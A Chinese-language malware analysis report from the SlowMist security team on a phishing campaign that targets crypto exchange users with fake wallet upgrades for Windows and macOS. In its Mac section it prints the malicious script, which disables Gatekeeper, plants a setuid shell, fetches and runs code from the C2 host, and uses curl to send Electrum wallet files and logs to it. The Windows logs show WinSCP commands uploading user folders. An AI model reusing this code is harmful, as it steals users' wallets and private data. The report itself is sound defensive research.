By:愛上平頂山@慢霧安全團隊
前言
近日,慢霧安全團隊收到情報,有專業黑產團隊針對交易所使用者進行大規模郵件批次撒網釣魚攻擊。
釣魚郵件如圖:
慢霧安全團隊收到情報後,第一時間展開分析。
以下是詳細分析過程:
攻擊細節
我們點選跳轉目標頁面:
從上圖可以看到,針對 Mac OS X / macOS / Windows 不同系統都給出了下載連結;連結指向駭客木馬檔案存放位置。
於3 天前,建立的賬號,裡面存在兩個專案:
b*****.github.io
b****t
上圖樣本“Bi****-Setup.exe” 是 Windows 下的惡意檔案。
“index.html” 是一個仿冒的升級提示頁面,誘導使用者升級下載。
詳細分析
接下來我們對Windows端和Mac端分別進行分析:1.Windows 端:
下圖為樣本“Bi****-Setup.exe” 數字簽名:
(1)EXE 檔案基本資訊
檔名稱:B****-KYC-Setup.exe
子檔案資訊:
script.txt / 877da6cdd4eb284e2d8887b24a24168c / Unknown
setup.exe / fe1818a5e8aed139a8ccf9f60312bb30 / EXE
WinSCP.exe / e71c39688fad97b66af3e297a04c3663 / EXE
(2)關鍵行為
行為描述:遮蔽視窗關閉訊息
詳情資訊:hWnd = 0x00030336, Text = Deep Onion Setup: Completed, ClassName = #32770
(3)程序行為
行為描述:建立本地執行緒
詳情資訊:
TargetProcess: %temp%\****.exe, InheritedFromPID = 2000, ProcessID = 2888, ThreadID = 2948, StartAddress = 00405209, Parameter = 0001034ATargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3140, ThreadID = 3188, StartAddress = 008B9F7C, Parameter = 00000000TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3140, ThreadID = 3192, StartAddress = 00819BF4, Parameter = 0272E170TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3164, ThreadID = 3196, StartAddress = 008B9F7C, Parameter = 00000000TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3164, ThreadID = 3200, StartAddress = 00819BF4, Parameter = 0272E270TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3172, ThreadID = 3232, StartAddress = 008B9F7C, Parameter = 00000000TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3120, ThreadID = 3236, StartAddress = 008B9F7C, Parameter = 00000000TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3172, ThreadID = 3240, StartAddress = 00819BF4, Parameter = 0272E170TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3120, ThreadID = 3244, StartAddress = 00819BF4, Parameter = 0272E170TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3180, ThreadID = 3248, StartAddress = 008B9F7C, Parameter = 00000000TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3180, ThreadID = 3252, StartAddress = 00819BF4, Parameter = 0272E170TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3140, ThreadID = 3264, StartAddress = 009B8C28, Parameter = 026F4B90TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3164, ThreadID = 3280, StartAddress = 009B8C28, Parameter = 026F4C90TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3172, ThreadID = 3284, StartAddress = 009B8C28, Parameter = 026F4B90TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3120, ThreadID = 3352, StartAddress = 009B8C28, Parameter = 026F4B90
(4)行為描述:建立新檔案程序
詳情資訊:
[0x00000c30]ImagePath = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.exe, CmdLine = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.exe" /ini=null /script="script.txt" /log="winscp_documents.log" /loglevel=0 /parameter "C:\Documents and Settings\Administrator\My Documents" "09-06-2020-4:51:51_documents"[0x00000c44]ImagePath = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.exe, CmdLine = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.exe" /ini=null /script="script.txt" /log="winscp_appdata.log" /loglevel=0 /parameter "C:\Documents and Settings\Administrator\Application Data" "09-06-2020-4:51:51_appdata"[0x00000c5c]ImagePath = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.exe, CmdLine = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.exe" /ini=null /script="script.txt" /log="winscp_localappdata.log" /loglevel=0 /parameter "C:\Documents and Settings\Administrator\Local Settings\Application Data" "09-06-2020-4:51:51_localappdata"[0x00000c64]ImagePath = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.exe, CmdLine = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.exe" /ini=null /script="script.txt" /log="winscp_onedrive.log" /loglevel=0 /parameter "C:\Documents and Settings\Administrator\OneDrive" "09-06-2020-4:51:51_onedrive"[0x00000c6c]ImagePath = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.exe, CmdLine = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.exe" /ini=null /script="script.txt" /log="winscp_pictures.log" /loglevel=0 /parameter "C:\Documents and Settings\Administrator\Pictures" "09-06-2020-4:51:51_pictures"
(5)檔案行為
行為描述:建立檔案
詳情資訊:
C:\Documents and Settings\Administrator\Local Settings\Temp\nsi9.tmpC:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\WinSCP.exeC:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\script.txtC:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\setup.exeC:\Documents and Settings\Administrator\Local Settings\Temp\nsyA.tmpC:\Documents and Settings\Administrator\Local Settings\Temp\nsyA.tmp\System.dllC:\Documents and Settings\Administrator\Application Data\winscp.rndC:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\winscp_appdata.logC:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\winscp_onedrive.logC:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\winscp_localappdata.logC:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\winscp_documents.logC:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\winscp_pictures.logC:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\null
(6)行為描述:建立可執行檔案
詳情資訊:
C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\setup.exeC:\Documents and Settings\Administrator\Local Settings\Temp\nsyA.tmp\System.dll
(7)行為描述:覆蓋已有檔案
詳情資訊:
C:\Documents and Settings\Administrator\Application Data\winscp.rndC:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\null
(8)行為描述:查詢檔案
詳情資訊:
FileName = C:\Documents and SettingsFileName = C:\Documents and Settings\AdministratorFileName = C:\Documents and Settings\Administrator\Local SettingsFileName = C:\Documents and Settings\Administrator\Local Settings\TempFileName = C:\Documents and Settings\Administrator\Local Settings\%temp%FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\nsyA.tmpFileName = C:\DOCUME~1FileName = C:\DOCUME~1\ADMINI~1FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1\TempFileName = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.exeFileName = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.zh-CNFileName = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.zh-HansFileName = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.zhFileName = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.CHS
(9)行為描述:刪除檔案
詳情資訊:
C:\Documents and Settings\Administrator\Local Settings\Temp\nsi9.tmpC:\Documents and Settings\Administrator\Local Settings\Temp\nsyA.tmp
(10)行為描述:修改檔案內容
詳情資訊:
C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\WinSCP.exe ---> Offset = 0C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\WinSCP.exe ---> Offset = 32768C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\WinSCP.exe ---> Offset = 33203C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\WinSCP.exe ---> Offset = 65971C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\WinSCP.exe ---> Offset = 66905C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\script.txt ---> Offset = 0C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\setup.exe ---> Offset = 0C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\setup.exe ---> Offset = 24146C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\setup.exe ---> Offset = 44980C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\setup.exe ---> Offset = 60884C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\setup.exe ---> Offset = 93652C:\Documents and Settings\Administrator\Local Settings\Temp\nsyA.tmp\System.dll ---> Offset = 0C:\Documents and Settings\Administrator\Application Data\winscp.rnd ---> Offset = 0C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\winscp_appdata.log ---> Offset = 0C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\winscp_appdata.log ---> Offset = 102
(11)網路行為
行為描述:建立到一個指定的套接字連線
詳情資訊:
IP: **.138.40.**:128, SOCKET = 0x000001d0
IP: **.138.40.**:128, SOCKET = 0x000001cc
我們測試開啟,自解壓:
結果發現用於上傳本地使用者資訊的FTP 賬號密碼,同時有一個正常的Electrum Installer 檔案,一旦使用者安裝後使用,在Electrum 下輸入的敏感資訊將被髮送到遠端惡意 FTP 伺服器接收。
2020年06月02日 開始,已經有使用者陸續中招。
2.Mac 端:
(1)安裝命令:
(2)指令碼內容:
(3)惡意地址:https://github.com/deep-onion
(模仿知名專案https://deeponion.org/的Github地址https://github.com/deeponion)
惡意地址下也有兩個專案:
deep-onion.github.io
wallet
https://github.com/deep-onion/deep-onion.github.io
此檔案此處不做分析。
(4)Mac 端
https://github.com/deep-onion/wallet
惡意檔案是DeepOnion
執行惡意指令碼後是一系列惡意操作,
如:
try { shell_exec("spctl --master-disable"); $ksh = trim(shell_exec("which ksh")); shell_exec("cp $ksh $homedir/.ksh"); shell_exec("cd $homedir && chown root:wheel .ksh && chmod a+rwxs .ksh"); shell_exec("cd $homedir && echo '#!/bin/bash' > .strtp && echo 'sleep 300' >> .strtp && echo 'curl http://crontab.site/?log=startup\&key=startup\&id=$id | $homedir/.ksh' >> .strtp && chown root:wheel .strtp && chmod a+x .strtp");try { $dir = "$homedir/.electrum/wallets"; if (file_exists($dir)) { $files = scandir($dir); foreach ($files as $file) { shell_exec("curl -s -->$dir/$file\" http://crontab.site/?log=startup\&key=$file\&id=$id"); } }} catch (Exception $e) { shell_exec('echo "Caught exception: ' . $e->getMessage() . '"' . " >> $log");}shell_exec("curl -s -->$log\" http://crontab.site/?log=startup\&key=log\&id=$id");whoami >> /tmp/cron.logls -al /Users/ >> /tmp/cron.logls -al $HOMEDIR >> /tmp/cron.logcurl -->"@/tmp/cron.log" http://crontab.site/?log=startup\&key=cron.log\&id=$UID
大致流程
透過以上一些列操作,從而盜取使用者隱私資訊。
備註:
C2 資訊:
crontab.site
phone_tag +7.9453949549
註冊時間2020-04-20 17:47:03
過期時間2021-04-20 23:59:59
更新時間2020-04-20 17:47:04
慢霧建議
針對本次攻擊事件慢霧安全團隊建議:
認清官方郵箱字尾
謹慎對待未知來源郵件裡的連結與附件
懷疑一切以“升級”、“賬號異常”等理由的郵件
對於需要處理但可疑的郵件內容,需及時諮詢專業人員
歡迎隨時聯絡慢霧安全團隊[email protected]